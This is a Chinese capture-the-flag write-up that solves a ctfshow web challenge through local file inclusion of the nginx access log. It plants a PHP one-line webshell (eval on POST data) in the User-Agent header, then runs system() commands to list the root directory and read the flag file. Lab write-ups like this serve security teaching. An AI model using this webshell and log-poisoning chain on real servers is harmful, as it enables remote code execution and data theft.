ctfshow-WEB AK赛-签到_观己

简介: ctfshow-WEB AK赛-签到_观己 WP

题目分析

打开网页

在这里插入图片描述

正则匹配过滤了php,且大小写不敏感

allow_url_include没有开启没有办法用伪协议,应该是利用日志包含解题

解题过程

在这里插入图片描述

?file=/var/log/nginx/access.log

发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话

在这里插入图片描述

在UA中添加一句话木马 <?php eval($_POST[1]);?>

在POST中令1=system('ls /');查看根目录中的文件

发现有个flag.txt 这里应该就是flag在的位置了

在这里插入图片描述

POST中令1=system('cat /flag.txt');

目录
相关文章
|
9月前
|
XML SQL PHP
WEB AK赛
WEB AK赛
87 0
ctfshow-WEB AK赛-web2_观星
ctfshow-WEB AK赛-web2_观星wp
263 0
ctfshow-WEB AK赛-web2_观星
ctfshow-WEB AK赛-web1_观字
ctfshow-WEB AK赛-web1_观字WP
120 0
ctfshow-WEB AK赛-web1_观字
|
3天前
|
存储 安全 前端开发
第五章 跨域资源共享(CORS):现代Web开发中的关键机制
第五章 跨域资源共享(CORS):现代Web开发中的关键机制
|
4天前
|
设计模式 开发框架 数据库
Python Web开发主要常用的框架
【5月更文挑战第12天】Python Web开发框架包括Django、Flask、Tornado和Pyramid。Django适用于复杂应用,提供ORM、模板引擎等全套功能;Flask轻量级,易于扩展,适合小型至中型项目;Tornado擅长处理高并发,支持异步和WebSockets;Pyramid灵活强大,可适配多种数据库和模板引擎,适用于各种规模项目。选择框架需依据项目需求和技术栈。
122 2
|
2天前
|
数据安全/隐私保护
那些酷炫的网页你也可以做到——第六篇,小型公司web开发
那些酷炫的网页你也可以做到——第六篇,小型公司web开发
|
2天前
|
JavaScript
js中如何使用工厂方式和构造函数创建对象,web开发项目实例
js中如何使用工厂方式和构造函数创建对象,web开发项目实例
|
2天前
|
JavaScript 前端开发 开发者
在Web开发中,事件处理是一个至关重要的概念
【5月更文挑战第17天】Vue.js的事件处理是其核心特性之一,允许开发者响应用户操作。通过v-on(或@)指令绑定DOM事件到方法,实现交互。事件修饰符如.stop、.prevent等简化处理逻辑。此外,Vue支持自定义事件,便于组件间通信,如子组件通过$emit触发事件,父组件使用v-on监听并响应。理解这些机制能帮助开发者更有效地管理Vue应用的事件流程。
10 0
|
2天前
|
前端开发 JavaScript 算法
探索现代Web开发中的前端框架选择
在现代Web开发中,前端框架的选择是至关重要的。本文将深入探讨各种前端框架的特点和适用场景,帮助开发者了解不同框架的优势和劣势,并为他们提供在项目中做出明智选择的指导。
|
3天前
|
设计模式 存储 前端开发
JS的几种设计模式,Web前端基础三剑客学习知识分享,前端零基础开发
JS的几种设计模式,Web前端基础三剑客学习知识分享,前端零基础开发